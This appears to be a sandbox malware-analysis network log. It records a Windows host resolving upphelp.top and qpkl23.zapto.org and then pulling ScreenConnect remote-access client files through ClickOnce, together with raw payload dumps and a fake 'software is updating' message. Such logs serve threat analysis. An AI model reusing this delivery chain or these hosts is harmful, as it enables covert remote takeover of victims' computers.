Sep 30, 2024 14:20:22.108700991 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.108819962 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.108828068 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.108911991 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.109288931 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.109303951 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.109395027 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.109404087 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.109493017 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.109844923 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.109859943 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.109951973 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.109958887 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.110017061 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.110389948 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.110460997 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.110467911 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.110479116 CEST	443	49740	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:22.110541105 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:22.110835075 CEST	49740	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:25.846607924 CEST	49743	8041	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:25.851494074 CEST	8041	49743	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:25.851629972 CEST	49743	8041	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:27.007448912 CEST	49743	8041	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:27.012284040 CEST	8041	49743	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:27.191375017 CEST	8041	49743	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:27.222471952 CEST	49743	8041	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:27.227371931 CEST	8041	49743	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:27.397547007 CEST	8041	49743	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:27.440773010 CEST	49743	8041	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:57.409693003 CEST	49743	8041	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:57.414640903 CEST	8041	49743	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:57.587353945 CEST	8041	49743	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:57.628434896 CEST	49743	8041	192.168.2.6	79.110.49.196
Sep 30, 2024 14:21:27.612871885 CEST	49743	8041	192.168.2.6	79.110.49.196
Sep 30, 2024 14:21:27.617758036 CEST	8041	49743	79.110.49.196	192.168.2.6
Sep 30, 2024 14:21:27.789601088 CEST	8041	49743	79.110.49.196	192.168.2.6
Sep 30, 2024 14:21:27.831439018 CEST	49743	8041	192.168.2.6	79.110.49.196
Sep 30, 2024 14:21:57.815999985 CEST	49743	8041	192.168.2.6	79.110.49.196
Sep 30, 2024 14:21:57.820878983 CEST	8041	49743	79.110.49.196	192.168.2.6
Sep 30, 2024 14:21:57.997842073 CEST	8041	49743	79.110.49.196	192.168.2.6
Sep 30, 2024 14:21:58.050249100 CEST	49743	8041	192.168.2.6	79.110.49.196

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 14:20:01.034876108 CEST	56596	53	192.168.2.6	1.1.1.1
Sep 30, 2024 14:20:01.461416960 CEST	53	56596	1.1.1.1	192.168.2.6
Sep 30, 2024 14:20:25.810390949 CEST	54611	53	192.168.2.6	1.1.1.1
Sep 30, 2024 14:20:25.820606947 CEST	53	54611	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 30, 2024 14:20:01.034876108 CEST	192.168.2.6	1.1.1.1	0x1c7c	Standard query (0)	upphelp.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 14:20:25.810390949 CEST	192.168.2.6	1.1.1.1	0x37c5	Standard query (0)	qpkl23.zapto.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 30, 2024 14:20:01.461416960 CEST	1.1.1.1	192.168.2.6	0x1c7c	No error (0)	upphelp.top		79.110.49.196	A (IP address)	IN (0x0001)	false
Sep 30, 2024 14:20:02.389935017 CEST	1.1.1.1	192.168.2.6	0x7149	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 30, 2024 14:20:02.389935017 CEST	1.1.1.1	192.168.2.6	0x7149	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Sep 30, 2024 14:20:04.367877960 CEST	1.1.1.1	192.168.2.6	0x4adc	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 30, 2024 14:20:04.367877960 CEST	1.1.1.1	192.168.2.6	0x4adc	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Sep 30, 2024 14:20:25.820606947 CEST	1.1.1.1	192.168.2.6	0x37c5	No error (0)	qpkl23.zapto.org		79.110.49.196	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

upphelp.top

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49715	79.110.49.196	443	5576	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 12:20:02 UTC	624	OUT	GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=c75cf581-c081-4bd7-96da-5933e5da1d56&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1 Host: upphelp.top Accept-Encoding: gzip Connection: Keep-Alive
2024-09-30 12:20:02 UTC	251	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 117980 Content-Type: application/x-ms-application; charset=utf-8 Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Mon, 30 Sep 2024 12:20:02 GMT Connection: close
2024-09-30 12:20:02 UTC	16133	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
2024-09-30 12:20:02 UTC	16384	IN	Data Raw: 47 6c 69 52 47 38 79 66 59 52 6f 64 77 71 45 6c 46 44 4c 68 4b 54 47 45 6b 53 6b 48 75 45 45 6c 4f 31 6d 42 49 59 67 77 51 54 4d 39 72 37 45 35 69 6e 4a 52 53 58 55 49 59 55 79 31 33 46 46 43 58 6b 4e 52 56 67 42 49 49 56 64 59 61 51 46 57 34 36 48 68 59 43 77 4a 63 57 48 61 72 43 46 67 30 41 33 42 5a 69 6a 54 45 5a 37 35 39 53 47 39 4a 2f 42 78 37 6a 76 49 67 65 76 55 2b 52 48 6d 39 47 32 52 37 6f 79 66 6f 65 77 58 79 75 48 77 39 4f 45 53 42 36 7a 43 6f 67 4a 72 39 62 49 45 39 4b 4f 79 46 4a 6c 31 59 68 45 58 59 63 49 74 50 52 58 43 4c 58 66 4a 4d 69 37 52 32 79 49 75 4c 43 75 53 4b 59 33 42 51 6a 4e 43 7a 2b 49 2f 2b 4a 57 79 52 67 6f 57 67 6b 77 6a 5a 75 4a 47 48 4c 62 69 51 6a 30 32 38 6b 68 48 35 7a 4a 4c 4a 32 74 43 54 42 31 6d 59 6c 66 59 4e 57 4a Data Ascii: GliRG8yfYRodwqElFDLhKTGEkSkHuEElO1mBIYgwQTM9r7E5inJRSXUIYUy13FFCXkNRVgBIIVdYaQFW46HhYCwJcWHarCFg0A3BZijTEZ759SG9J/Bx7jvIgevU+RHm9G2R7oyfoewXyuHw9OESB6zCogJr9bIE9KOyFJl1YhEXYcItPRXCLXfJMi7R2yIuLCuSKY3BQjNCz+I/+JWyRgoWgkwjZuJGHLbiQj028khH5zJLJ2tCTB1mYlfYNWJ
2024-09-30 12:20:02 UTC	16384	IN	Data Raw: 55 41 62 41 42 4e 41 47 45 41 62 67 42 68 41 47 63 41 5a 51 42 44 41 48 49 41 5a 51 42 6b 41 47 55 41 62 67 42 30 41 47 6b 41 59 51 42 73 41 48 4d 41 52 41 42 6c 41 48 4d 41 59 77 42 79 41 47 6b 41 63 41 42 30 41 47 6b 41 62 77 42 75 41 43 49 4e 41 41 42 45 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 54 51 42 68 41 47 34 41 59 51 42 6e 41 47 55 41 51 77 42 79 41 47 55 41 5a 41 42 6c 41 47 34 41 64 41 42 70 41 47 45 41 62 41 42 7a 41 46 51 41 61 51 42 30 41 47 77 41 5a 51 42 5a 44 51 41 41 54 45 4d 41 62 77 42 75 41 48 51 41 63 67 42 76 41 47 77 41 55 41 42 68 41 47 34 41 5a 51 42 73 41 45 30 41 59 51 42 75 41 47 45 41 5a 77 42 6c 41 46 41 41 5a 51 42 79 41 48 4d 41 62 77 42 75 41 47 45 41 62 41 42 55 41 Data Ascii: UAbABNAGEAbgBhAGcAZQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMARABlAHMAYwByAGkAcAB0AGkAbwBuACINAABEQwBvAG4AdAByAG8AbABQAGEAbgBlAGwATQBhAG4AYQBnAGUAQwByAGUAZABlAG4AdABpAGEAbABzAFQAaQB0AGwAZQBZDQAATEMAbwBuAHQAcgBvAGwAUABhAG4AZQBsAE0AYQBuAGEAZwBlAFAAZQByAHMAbwBuAGEAbABUA
2024-09-30 12:20:02 UTC	16384	IN	Data Raw: 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 63 77 42 45 41 47 6b 41 59 51 42 73 41 47 38 41 5a 77 42 55 41 47 55 41 65 41 42 30 41 45 4d 41 62 77 42 75 41 48 51 41 5a 51 42 75 41 48 51 41 52 67 42 76 41 48 49 41 62 51 42 68 41 48 51 41 65 79 30 41 41 45 35 4e 41 47 45 41 59 77 42 4a 41 47 34 41 63 77 42 30 41 48 49 41 64 51 42 6a 41 48 51 41 61 51 42 76 41 47 34 41 59 51 42 73 41 45 51 41 61 51 42 68 41 47 77 41 62 77 42 6e 41 45 51 41 61 51 42 7a 41 47 30 41 61 51 42 7a 41 48 4d 41 51 67 42 31 41 48 51 41 64 41 42 76 41 47 34 41 56 41 42 6c 41 48 67 41 64 41 43 4b 4d 51 41 41 51 6b 30 41 59 51 42 6a 41 46 49 41 5a 51 42 70 41 47 34 41 63 77 42 30 41 47 45 41 62 41 42 73 41 46 55 41 62 67 42 70 41 47 34 41 63 77 42 30 41 Data Ascii: AAZQByAG0AaQBzAHMAaQBvAG4AcwBEAGkAYQBsAG8AZwBUAGUAeAB0AEMAbwBuAHQAZQBuAHQARgBvAHIAbQBhAHQAey0AAE5NAGEAYwBJAG4AcwB0AHIAdQBjAHQAaQBvAG4AYQBsAEQAaQBhAGwAbwBnAEQAaQBzAG0AaQBzAHMAQgB1AHQAdABvAG4AVABlAHgAdACKMQAAQk0AYQBjAFIAZQBpAG4AcwB0AGEAbABsAFUAbgBpAG4AcwB0A
2024-09-30 12:20:02 UTC	16384	IN	Data Raw: 4e 6f 62 32 39 7a 5a 53 42 33 61 47 6c 6a 61 43 42 73 62 32 64 76 62 69 42 7a 5a 58 4e 7a 61 57 39 75 49 48 52 76 49 47 4e 76 62 6e 52 79 62 32 77 67 62 32 34 67 64 47 68 6c 49 48 4a 6c 62 57 39 30 5a 53 42 74 59 57 4e 6f 61 57 35 6c 4c 67 45 55 55 32 56 73 5a 57 4e 30 49 45 78 76 5a 32 39 75 49 46 4e 6c 63 33 4e 70 62 32 34 42 45 56 4e 6c 62 47 56 6a 64 43 42 4e 61 57 4e 79 62 33 42 6f 62 32 35 6c 41 53 74 44 61 47 39 76 63 32 55 67 62 32 35 6c 49 47 39 79 49 47 31 76 63 6d 55 67 63 6d 56 74 62 33 52 6c 49 47 31 76 62 6d 6c 30 62 33 4a 7a 49 48 52 76 49 48 5a 70 5a 58 63 75 41 51 39 54 5a 57 78 6c 59 33 51 67 54 57 39 75 61 58 52 76 63 6e 4d 42 52 6b 4e 6f 62 32 39 7a 5a 53 42 68 49 47 78 76 64 32 56 79 49 48 46 31 59 57 78 70 64 48 6b 67 61 57 59 67 62 Data Ascii: Nob29zZSB3aGljaCBsb2dvbiBzZXNzaW9uIHRvIGNvbnRyb2wgb24gdGhlIHJlbW90ZSBtYWNoaW5lLgEUU2VsZWN0IExvZ29uIFNlc3Npb24BEVNlbGVjdCBNaWNyb3Bob25lAStDaG9vc2Ugb25lIG9yIG1vcmUgcmVtb3RlIG1vbml0b3JzIHRvIHZpZXcuAQ9TZWxlY3QgTW9uaXRvcnMBRkNob29zZSBhIGxvd2VyIHF1YWxpdHkgaWYgb
2024-09-30 12:20:02 UTC	16384	IN	Data Raw: 47 6c 6a 53 32 56 35 56 47 39 72 5a 57 34 39 59 6a 63 33 59 54 56 6a 4e 54 59 78 4f 54 4d 30 5a 54 41 34 4f 53 4e 54 65 58 4e 30 5a 57 30 75 55 6d 56 7a 62 33 56 79 59 32 56 7a 4c 6c 4a 31 62 6e 52 70 62 57 56 53 5a 58 4e 76 64 58 4a 6a 5a 56 4e 6c 64 41 49 41 41 41 41 42 41 41 41 41 41 41 41 41 41 46 42 42 52 46 42 42 52 46 43 2f 6f 32 35 66 41 41 41 41 41 4f 45 41 41 41 41 67 51 51 42 77 41 48 41 41 62 41 42 70 41 47 4d 41 59 51 42 30 41 47 6b 41 62 77 42 75 41 46 51 41 61 51 42 30 41 47 77 41 5a 51 41 41 41 41 41 41 41 54 35 54 62 32 5a 30 64 32 46 79 5a 53 42 70 63 79 42 31 63 47 52 68 64 47 6c 75 5a 79 34 75 4c 69 42 51 62 47 56 68 63 32 55 67 5a 47 38 67 62 6d 39 30 49 48 52 31 63 6d 34 67 62 32 5a 6d 49 48 6c 76 64 58 49 67 59 32 39 74 63 48 56 30 Data Ascii: GljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAABAAAAAAAAAFBBRFBBRFC/o25fAAAAAOEAAAAgQQBwAHAAbABpAGMAYQB0AGkAbwBuAFQAaQB0AGwAZQAAAAAAAT5Tb2Z0d2FyZSBpcyB1cGRhdGluZy4uLiBQbGVhc2UgZG8gbm90IHR1cm4gb2ZmIHlvdXIgY29tcHV0
2024-09-30 12:20:02 UTC	16384	IN	Data Raw: 6e 32 53 49 53 73 41 52 4e 32 4b 78 43 42 6f 41 2f 69 54 74 74 53 4f 77 67 2b 39 44 36 47 36 52 49 48 51 2f 79 52 43 58 67 44 50 37 4f 4b 4a 71 78 47 49 49 43 51 41 2b 32 2f 65 30 48 59 6b 65 50 42 39 43 46 33 76 6e 57 48 55 4a 48 4a 65 41 73 2f 73 34 59 6d 72 45 59 67 67 4a 41 47 36 30 34 71 68 39 71 7a 6d 45 37 69 64 6c 53 32 41 45 48 4a 68 62 63 54 5a 69 63 51 49 4e 59 4a 36 4c 77 62 51 64 6c 78 2f 38 48 6b 4b 50 69 67 58 78 64 4a 62 79 64 78 45 77 6a 56 69 63 51 41 50 41 73 71 58 76 61 53 64 43 51 58 67 39 68 45 36 4c 78 58 43 6d 65 42 6c 48 64 41 4a 75 66 68 39 6a 49 78 59 6e 30 41 42 32 6d 55 52 58 2b 6e 35 68 35 50 4d 7a 46 49 78 42 38 54 4b 4f 2b 41 53 38 39 54 61 2b 52 69 78 4f 6f 41 48 4d 6e 6a 76 33 32 68 45 62 34 6f 50 48 6e 64 44 72 42 57 4e Data Ascii: n2SISsARN2KxCBoA/iTttSOwg+9D6G6RIHQ/yRCXgDP7OKJqxGIICQA+2/e0HYkePB9CF3vnWHUJHJeAs/s4YmrEYggJAG604qh9qzmE7idlS2AEHJhbcTZicQINYJ6LwbQdlx/8HkKPigXxdJbydxEwjVicQAPAsqXvaSdCQXg9hE6LxXCmeBlHdAJufh9jIxYn0AB2mURX+n5h5PMzFIxB8TKO+AS89Ta+RixOoAHMnjv32hEb4oPHndDrBWN
2024-09-30 12:20:02 UTC	3543	IN	Data Raw: 79 76 67 75 4a 45 58 51 41 41 4b 59 31 45 44 4b 75 66 68 6c 68 49 71 67 41 51 51 77 71 57 6b 63 39 2b 4f 58 45 5a 6f 45 44 53 43 41 53 51 32 6b 48 45 4d 58 6b 69 4a 6f 41 41 46 4d 36 67 72 63 37 30 4a 36 71 77 67 61 41 41 47 63 36 77 72 63 37 30 4a 36 61 42 49 30 41 41 49 34 31 30 44 4b 2b 43 36 6b 56 34 34 6e 67 41 41 6d 4e 59 30 6a 76 67 76 70 30 50 45 45 45 4d 41 6b 70 6e 47 4d 59 52 66 53 73 75 4d 4a 49 49 42 4a 58 49 48 48 73 41 76 70 32 50 45 45 45 4d 41 6b 72 73 42 6a 36 45 49 79 69 42 4a 41 41 4a 4d 61 53 42 6d 2f 43 38 6b 67 53 67 41 42 54 48 49 67 5a 66 77 75 4a 49 4d 6f 41 51 51 77 79 57 6b 63 4b 37 30 41 76 6d 38 51 4a 51 41 43 4f 4e 63 30 6a 6e 76 68 58 55 68 71 73 41 41 45 4d 4b 6b 72 38 47 70 38 46 35 49 61 4c 41 41 42 7a 48 55 37 74 33 51 Data Ascii: yvguJEXQAAKY1EDKufhlhIqgAQQwqWkc9+OXEZoEDSCASQ2kHEMXkiJoAAFM6grc70J6qwgaAAGc6wrc70J6aBI0AAI410DK+C6kV44ngAAmNY0jvgvp0PEEEMAkpnGMYRfSsuMJIIBJXIHHsAvp2PEEEMAkrsBj6EIyiBJAAJMaSBm/C8kgSgABTHIgZfwuJIMoAQQwyWkcK70Avm8QJQACONc0jnvhXUhqsAAEMKkr8Gp8F5IaLAABzHU7t3Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49719	79.110.49.196	443	5576	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 12:20:03 UTC	93	OUT	GET /Bin/ScreenConnect.Client.manifest HTTP/1.1 Host: upphelp.top Accept-Encoding: gzip
2024-09-30 12:20:04 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 17866 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Mon, 30 Sep 2024 12:20:04 GMT Connection: close
2024-09-30 12:20:04 UTC	16168	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
2024-09-30 12:20:04 UTC	1698	IN	Data Raw: 32 71 32 41 53 34 2b 6a 57 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32 46 4b 5a 62 53 31 31 30 59 55 Data Ascii: 2q2AS4+jWufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2FKZbS110YU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49726	79.110.49.196	443	5576	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 12:20:07 UTC	119	OUT	GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1 Host: upphelp.top Accept-Encoding: gzip Connection: Keep-Alive
2024-09-30 12:20:07 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 95520 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Mon, 30 Sep 2024 12:20:06 GMT Connection: close
2024-09-30 12:20:07 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
2024-09-30 12:20:08 UTC	16384	IN	Data Raw: 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40 41 00 e9 0f 00 00 00 cc cc cc cc 53 51 bb 30 40 41 00 Data Ascii: ut@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@ASQ0@A
2024-09-30 12:20:08 UTC	16384	IN	Data Raw: ff 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 8b 86 90 00 00 00 2d fe 00 00 00 50 e8 cc d8 ff ff 8b Data Ascii: ttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF\|t^8uYt8uP0(YYt8uPYYv\|YYtE8u@-P
